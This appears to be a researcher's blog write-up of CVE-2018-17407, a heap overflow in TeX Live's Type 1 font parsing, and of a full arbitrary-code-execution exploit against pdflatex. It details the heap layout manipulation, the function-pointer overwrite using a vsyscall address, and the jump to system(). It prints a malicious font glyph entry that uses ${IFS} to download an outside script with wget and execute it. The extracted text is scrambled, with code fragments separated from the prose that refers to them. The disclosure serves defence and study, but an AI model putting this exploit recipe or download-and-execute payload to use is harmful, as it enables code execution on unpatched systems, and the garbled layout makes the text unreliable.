pdflatex

This post is about a heap memory corruption vulnerability in TeX Live, the popular distribution of LaTeX. I couldn’t resist writing a full exploit for it, so the majority of this writeup demonstrates how the bug can be leveraged for an arbitrary code execution attack whenis run on a poisoned input.

Summary

CVE-2018-17407 is a heap buffer overflow caused by the unsafe processing of Type 1 font files (.pfb files). I reported it to the developers on Sept 12, 2018, and a patch was rolled out with a public security advisory on Sept 21, 2018. It affects the following tools in the TeX Live suite: pdflatex , pdftex , dvips , and luatex . To trigger the buffer overflow a malicious font must be processed by one of the vulnerable tools. Fonts are found and loaded automatically, so a feasible attack could be mounted by planting a malicious font in a shared repository in which other users might run pdflatex . See this page for more information about affected versions and tracking. The vulnerable code was also forked by the MiKTeX project and has been fixed in MiKTeX 2.9.6840.

dvips

static void t1_check_unusual_charstring ( void ) { char * p = strstr ( t1_line_array , charstringname ) + strlen ( charstringname ) ; int i ; /* if no number follows "/CharStrings", let's read the next line */ if ( sscanf ( p , " %i " , & amp ; i ) ! = 1 ) { strcpy ( t1_buf_array , t1_line_array ) ; * ( strend ( t1_buf_array ) - 1 ) = ' ' ; t1_getline ( ) ; strcat ( t1_buf_array , t1_line_array ) ; strcpy ( t1_line_array , t1_buf_array ) ; t1_line_ptr = eol ( t1_line_array ) ; } }

t1_buf_array

strcat()

t1_line_array

t1_buf_array

closefilesandterminate()

strcat()

memcpy()

pdflatex

pdftex

dvips

luatex

pdflatex

pdflatex

pdflatex

/* Tree data structure. */ struct avl_table { struct avl_node * avl_root ; /* Tree's root. */ avl_comparison_func * avl_compare ; /* Comparison function. */ void * avl_param ; /* Extra argument to |avl_compare|. */ struct libavl_allocator * avl_alloc ; /* Memory allocator. */ size_t avl_count ; /* Number of items in tree. */ unsigned long avl_generation ; /* Generation number. */ } ;

avl_compare

avl_compare

pdflatex

struct avl_table

t1_buf_array

avl_table

strcat()

avl_root

avl_compare

avl_compare

avl_root

avl_compare

avl_root

pdflatex

pmap

Address Kbytes RSS Dirty Mode Mapping 0000000000400000 2460 832 0 r-x-- pdftex 0000000000400000 0 0 0 r-x-- pdftex 0000000000867000 8 8 4 r---- pdftex ... 00007fbde01db000 1792 1296 0 r-x-- libc-2.23.so 00007fbde01db000 0 0 0 r-x-- libc-2.23.so 00007fbde039b000 2048 0 0 ----- libc-2.23.so .. 00007fbde05a5000 0 0 0 r-x-- libm-2.23.so 00007fbde06ad000 2044 0 0 ----- libm-2.23.so ... 00007fff359bd000 132 20 20 rw--- [ stack ] ffffffffff600000 4 0 0 r-x-- [ anon ] ffffffffff600000 0 0 0 r-x-- [ anon ]

strcat()

avl_root

avl_root

pdflatex

pdflatex

system()

--shell-escape

system()

char *

system()

... dup 45 /hyphen put dup 46 /period put dup 47 /slash put dup 48 /zero put dup 49 /one put dup 50 /two put dup 51 /three put dup 52 /four put ...

dup 47 /COMMAND_HERE put

system()

sh

dup 47 /wget${IFS}nickroessler.com/s${IFS}&&${IFS}chmod${IFS}+x${IFS}s${IFS}&&./s put

wget nickroessler.com/s && chmod +x s && ./s

pdflatex

pdflatex

I was initially using the AFL fuzzer on, a tool for converting DVI files into PS files. DVI files are quite compact binary files which are typically converted to PDF or PostScript for visualization. The DVI filetype doesn’t support embedding fonts, so DVI files instead refer to font names they expect to find on the system during visualization. What happened is that AFL randomly mutated the name of a font in the DVI file and discovered another valid font on my own system all by itself! The font that it discovered had particularly short line lengths, which led to some false positive alerts from Address Sanitizer when parsing it. While investigating those false positives, I eventually stumbled upon the following vulnerable function by manual inspection:This function handles a special case in which a logical line of the font file may be split into two input lines. It reads them both and concatenates them together intowith a call to— but without a bounds check! Oops—two lines are stored into the space for one. The buffers here (and) are managed automatically with a set of macros. By crafting long lines in a .pfb file we can grow these buffers to arbitrary sizes, and then use a “/CharStrings” line to trigger the overflow. This provides us with a very powerful heap memory corruption primitive for two reasons: (1) we get to choose the size of the buffer, which gives us a high degree of influence on where the allocator positions it, and (2) we can overflow the buffer by its full (and arbitrarily chosen) size, giving us a far reach into whatever objects live in nearby memory. However, this bug isn’t triggered untilis called, which as the name suggests doesn’t leave us much time to make use of our memory corruption capability before the program exits. And secondly,doesn’t copy null bytes, which makes exploitation significantly trickier than it would be with an equivalentoverflow.This same vulnerable function is used by other tools in TeX Live:and. I only built an exploit for, the most widely used of the vulnerable tools. A detail I ignore in this writeup is that .pfb include some “encrypted” (scrambled) sections as well as checksum verification, and so I built a simple .pfb file creator to convert plain-text payloads into valid pfb files to easily set file contents as desired. It’s also worth noting that this checksum verification would have prevented a blind fuzzer from reaching this vulnerability, as LaTeX stops processing a font when the checksum for a file section fails.To begin evaluating how the bug might be exploited, I wrote and embedded a scanner intothat probed all of the code pointers stored in the heap to check if any of them are used in the small window of time between the overflow andexiting. There were a couple of hits! I traced them down to the following data structure:TeX Live makes heavy use of AVL trees for managing generic objects, including strings, images and font glyphs. Thefunction pointer is used for polymorphism-like behavior in C, allowing a range of comparison functions to be implemented for different kinds of objects. By controlling, we have the opportunity to hijack the control-flow ofwhen the program later uses its AVL tree. And, fortunately, these code pointers are used in the termination routines and thus serve as viable targets!Having chosen a target structure, the next step is to arrange the heap such that the victimis located in memory directly after thefrom which we can overflow. I wrote a simple brute force heap manipulator that generates LaTeX documents, and ran it to find exploitable heap layouts. After several thousand heap arrangement attempts, it found an optimal layout with a distance of only 16 bytes (the minimum possible including the allocator metadata) between the end of the buffer and the first field of the victim struct. Note that this stage would need to be rerun again for a new TeX file input although the same font payload could be reused; it’s also likely that more robust heap spraying could be done, but I didn’t spend any time doing so.After positioning the victim struct to follow the buffer we can overflow, we can proceed to overwrite the fields of the. Because the text section of the program is mapped to low virtual addresses, code pointers have multiple null bytes in their most significant bytes (and we can’t copy null bytes with). However, we can clobberand continue writing to just the least significant bytes of(thanks to the little endian byte ordering on x86), which is already a valid code pointer and has appropriate null bytes in the high bits of the address. This allows us to redirectto any code location of our choosing, but to do so we must overwrite. This is indeed problematic: all code locations that make use offirst issue an access from thepointer, causing a segmentation fault before we hijack control-flow. I found I could solve this issue with a clever trick. Let’s look at the memory layout of theprocess withThe bottom entry is the vsyscall region. It’s conveniently mapped to the high end of the virtual address space with no ASLR. And importantly, it contains addresses with no null bytes, such as 0xffffffffff600ffc. We can then useto write this static address over, and because it’s in a readable region theload completes without crashing the program.then proceeds to load and use our corrupted function pointer.The last piece of the puzzle is making use of our control-flow hijack.has a few calls tolying around for supporting functionality such as running shell commands. For security reasons these are disabled unless theflag is set, but with our control-flow hijack we can evade these checks by simply jumping to the instructions in the code after the checks have already taken place. The various call sites (and the various entry points to those call sites) give us a range of register (and stack-stored) values that we can prepare as arguments to. Additionally, the heap manipulator found several locations that use the corrupted AVL tree and the hijack could be launched from any of them. One of these combinations allows us to erroneously set the input register to apointer that points to the name of one of the glyphs being operated on! We can use it to redirect the name of the glyph from the font file to serve as an argument to. Its contents are loaded into memory from reading entries like these from the .pfb file:Which means that we can simply modify our malicious font like so:And then the string “COMMAND_HERE” will be passed to. A last detail to clean up is that the parsing code stops reading the glyph name when it encounters a space, which at first seems quite limiting on how expressive our injected command can be. However, becauseinterprets the string, we have a range of options for getting around this restriction using shell semantics. In particular, the Internal Field Separator environment variable contains a space, a tab and a newline. Alternatively, brace expansion is another way to evade the space limitation. Using the IFS method we can then replace the glyph name with:to encode ““. And voila! We can now hijackto do as we please. In this case, LaTeX downloads a shell script from the Internet and executes it with the permissions of theprocess:The downloaded script prints “hello from shell!” before the program segfaults from its corrupted state.I’d like to thank Norbert Preining and Karl Berry of the TeX Live team for their professional and quick responses and for being pleasant to work with on the patch.



